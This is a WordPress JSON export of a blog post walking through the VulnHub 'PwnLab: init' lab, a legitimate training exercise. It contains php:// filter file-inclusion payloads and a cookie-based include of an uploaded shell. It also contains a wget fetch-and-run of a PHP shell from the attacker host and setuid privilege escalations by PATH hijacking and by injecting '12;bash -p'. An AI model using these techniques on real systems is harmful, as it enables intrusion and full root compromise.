{"id":170,"date":"2024-04-18T23:29:52","date_gmt":"2024-04-18T15:29:52","guid":{"rendered":"http:\/\/xiyu12.top\/?p=170"},"modified":"2024-04-18T23:29:52","modified_gmt":"2024-04-18T15:29:52","slug":"pwnlab","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=170","title":{"rendered":"pwnlab"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li><strong>Name<\/strong>: PwnLab: init<\/li>\n\n\n\n<li><strong>Date release<\/strong>: 1 Aug 2016<\/li>\n\n\n\n<li><strong>Author<\/strong>:&nbsp;<a href=\"https:\/\/www.vulnhub.com\/author\/claor,331\/\">Claor<\/a><\/li>\n\n\n\n<li><strong>Series<\/strong>:&nbsp;<a href=\"https:\/\/www.vulnhub.com\/series\/pwnlab,92\/\">PwnLab<\/a><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.vulnhub.com\/entry\/pwnlab-init,158\/\">PwnLab: init ~ VulnHub<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">I. Information gathering<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">sudo nmap -sn 192.168.1.0\/24 finds the target: 192.168.1.131<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo nmap -sT --min-rate 10000 192.168.1.131<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-18 13:41 CST\nNmap scan report for 192.168.1.131\nHost is up (0.0026s latency).\nNot shown: 65531 closed tcp ports (conn-refused)\nPORT      STATE SERVICE\n80\/tcp    open  http\n111\/tcp   open  rpcbind\n3306\/tcp  open  mysql\n37489\/tcp open  unknown\nMAC Address: 00:0C:29:8F:0E:10 (VMware)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">sudo nmap -sV -sC -O -p 37489,80,3306,111 192.168.1.131<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>PORT      STATE SERVICE VERSION\n80\/tcp    open  http    Apache httpd 2.4.10 ((Debian))\n|_http-title: PwnLab Intranet Image Hosting\n|_http-server-header: Apache\/2.4.10 (Debian)\n111\/tcp   open  rpcbind 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100024  1          34419\/udp6  status\n|   100024  1          37093\/udp   status\n|   100024  1          37489\/tcp   status\n|_  100024  1          39570\/tcp6  status\n3306\/tcp  open  mysql   MySQL 5.5.47-0+deb8u1\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.5.47-0+deb8u1\n|   Thread ID: 41\n|   Capabilities flags: 63487\n|   Some Capabilities: FoundRows, SupportsLoadDataLocal, SupportsCompression, Speaks41ProtocolNew, LongPassword, ConnectWithDatabase, IgnoreSigpipes, Support41Auth, DontAllowDatabaseTableColumn, InteractiveClient, LongColumnFlag, Speaks41ProtocolOld, ODBCClient, IgnoreSpaceBeforeParenthesis, SupportsTransactions, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults\n|   Status: Autocommit\n|   Salt: kIle4pZSoU&lt;k)&amp;%$'5um\n|_  Auth Plugin Name: mysql_native_password\n37489\/tcp open  status  1 (RPC #100024)\nMAC Address: 00:0C:29:8F:0E:10 (VMware)\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 13.50 seconds<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">So far we know there is a MySQL service, a web service, and port 111 (rpcbind), which may mean NFS shares are exported<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">showmount 192.168.1.131<br>clnt_create: RPC: Program not registered<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">No NFS<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Web directory scan<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>gobuster dir -u http:\/\/192.168.1.131 --wordlist=\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x .txt,.zip,.html,.php\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n&#91;+] Url:                     http:\/\/192.168.1.131\n&#91;+] Method:                  GET\n&#91;+] Threads:                 10\n&#91;+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n&#91;+] Negative Status codes:   404\n&#91;+] User Agent:              gobuster\/3.6\n&#91;+] Extensions:              html,php,txt,zip\n&#91;+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/images               (Status: 301) &#91;Size: 315] &#91;--&gt; http:\/\/192.168.1.131\/images\/]\n\/login.php            (Status: 200) &#91;Size: 250]\n\/.php                 (Status: 403) &#91;Size: 292]\n\/.html                (Status: 403) &#91;Size: 293]\n\/index.php            (Status: 200) &#91;Size: 332]\n\/upload.php           (Status: 200) &#91;Size: 19]\n\/upload               (Status: 301) &#91;Size: 315] &#91;--&gt; http:\/\/192.168.1.131\/upload\/]\n\/config.php           (Status: 200) &#91;Size: 0]\n\/.html                (Status: 403) &#91;Size: 293]\n\/.php                 (Status: 403) &#91;Size: 292]\n\/server-status        (Status: 403) &#91;Size: 301]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">II. Getting a foothold<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Visit http:\/\/192.168.1.131<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-12-1024x191.png\" alt=\"\" class=\"wp-image-171\" width=\"1024\" height=\"191\" style=\"width:840px;height:auto\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-13-1024x220.png\" alt=\"\" class=\"wp-image-172\" width=\"1024\" height=\"220\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Two avenues: the login form and the page parameter<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Login form: tested for SQL injection with ', \", and 1=1, and 1=2; no reaction<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The page parameter<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Directory traversal \/ file inclusion with ..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd: no reaction<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd%00: no reaction<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Use the php:\/\/ stream wrapper: php:\/\/filter\/read=convert.base64-encode\/resource=<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/192.168.1.131\/?page=php:\/\/filter\/read=convert.base64-encode\/resource=login<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-18-233830-1024x219.png\" alt=\"\" class=\"wp-image-176\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The earlier scan also found config.php; include it the same way<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-18-234137-1024x506.png\" alt=\"\" class=\"wp-image-177\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">This gives the MySQL config file. Log in to MySQL, get the account, and decode it with base64 -d<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">mysql -h 192.168.1.131 -u root -p<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-18-234403.png\" alt=\"\" class=\"wp-image-178\" style=\"width:664px;height:auto\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">After logging in to the web app, upload becomes accessible and files can be uploaded<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Use the file inclusion vulnerability to read the code of upload.php<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php \nif(isset($_POST&#91;'submit'])) {\n\tif ($_FILES&#91;'file']&#91;'error'] &lt;= 0) {\n\t\t$filename  = $_FILES&#91;'file']&#91;'name'];\n\t\t$filetype  = $_FILES&#91;'file']&#91;'type'];\n\t\t$uploaddir = 'upload\/';\n\t\t$file_ext  = strrchr($filename, '.');\n\t\t$imageinfo = getimagesize($_FILES&#91;'file']&#91;'tmp_name']);\n\t\t$whitelist = array(\".jpg\",\".jpeg\",\".gif\",\".png\"); \n\t\tif (!(in_array($file_ext, $whitelist))) {\n\t\t\tdie('Not allowed extension, please upload images only.');\n\t\t}\n\t\tif(strpos($filetype,'image') === false) {\n\t\t\tdie('Error 001');\n\t\t}\n\t\tif($imageinfo&#91;'mime'] != 'image\/gif' &amp;&amp; $imageinfo&#91;'mime'] != 'image\/jpeg' &amp;&amp; $imageinfo&#91;'mime'] != 'image\/jpg'&amp;&amp; $imageinfo&#91;'mime'] != 'image\/png') {\n\t\t\tdie('Error 002');\n\t\t}\n\t\tif(substr_count($filetype, '\/')>1){\n\t\t\tdie('Error 003');\n\t\t}\n\t\t$uploadfile = $uploaddir . md5(basename($_FILES&#91;'file']&#91;'name'])).$file_ext;\n\n\t\tif (move_uploaded_file($_FILES&#91;'file']&#91;'tmp_name'], $uploadfile)) {\n\t\t\techo \"&lt;img src=\\\"\".$uploadfile.\"\\\">&lt;br \/>\";\n\t\t} else {\n\t\t\tdie('Error 4');}}}?><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The upload filter checks two things: 1. the file extension 2. the MIME type<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Two ways to get a shell<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">1. Combine the file inclusion with the file upload<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n\/\/Multilingual. Not implemented yet.\n\/\/setcookie(\"lang\",\"en.lang.php\");\nif (isset($_COOKIE&#91;'lang']))\n{\n\tinclude(\"lang\/\".$_COOKIE&#91;'lang']);\n}\n\/\/ Not implemented yet.\n?>\n&lt;img src=\"images\/pwnlab.png\">&lt;br \/>\n&#91; &lt;a href=\"\/\">Home&lt;\/a> ] &#91; &lt;a href=\"?page=login\">Login&lt;\/a> ] &#91; &lt;a href=\"?page=upload\">Upload&lt;\/a> ]\n&lt;hr\/>&lt;br\/>\n&lt;?php\n\tif (isset($_GET&#91;'page']))\n\t{\n\t\tinclude($_GET&#91;'page'].\".php\");\n\t}\n\telse\n\t{echo \"Use this server to upload and share image files inside the intranet\";}\n?>\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The file inclusion is in if (isset($_COOKIE['lang'])) { include(\"lang\/\".$_COOKIE['lang']); }<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">curl http:\/\/192.168.1.131\/index.php -H \"Cookie: lang=..\/upload\/135c0e6e32394050f70dc6bdb4e18ab0.gif\"<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-19-161918-1024x373.png\" alt=\"\" class=\"wp-image-183\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Got a shell<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">2. Use the php_filter_chain_generator-main tool to get RCE through the file inclusion<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-19-162333-1024x778.png\" alt=\"\" class=\"wp-image-184\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-19-162512.png\" alt=\"\" class=\"wp-image-185\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code># then fetch the shell with wget\n# on the attacker machine (192.168.1.130): serve the file\npython3 -m http.server 8000\n# on the target, through the RCE: download and run it\nwget http:\/\/192.168.1.130:8000\/htb-php -O \/tmp\/1.php\nphp \/tmp\/1.php<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Got a shell<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">III. Privilege escalation<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Two privilege escalation points<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">1. msgmike has the setuid bit set and runs the cat command from inside the binary; escalate by hijacking the environment (PATH)<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cd \/tmp\n# create a fake cat that spawns a privileged shell and make it executable\nprintf '#!\/bin\/sh\\n\/bin\/bash -p\\n' > cat\nchmod +x cat\nexport PATH=\/tmp:$PATH\n.\/msgmike\n# msgmike now runs \/tmp\/cat instead of \/bin\/cat: root shell<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">2. msg2root has the setuid bit set and calls system(); bypass the restriction in asprintf(&amp;command, \"\/bin\/echo %s >> \/root\/messages.txt\", input);<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/msg2root\n# at the prompt, enter: 12;bash -p\n# root shell<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>PwnLab: init ~ VulnHub I. Information gathering sudo nmap -sn 192.168.1.0 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":63,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[20,61,106,108],"class_list":["post-170","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-target-aircraft","tag-asprintf","tag-php-","tag-106","tag-108"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/170","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=170"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/170\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/media\/63"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=170"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=170"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=170"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}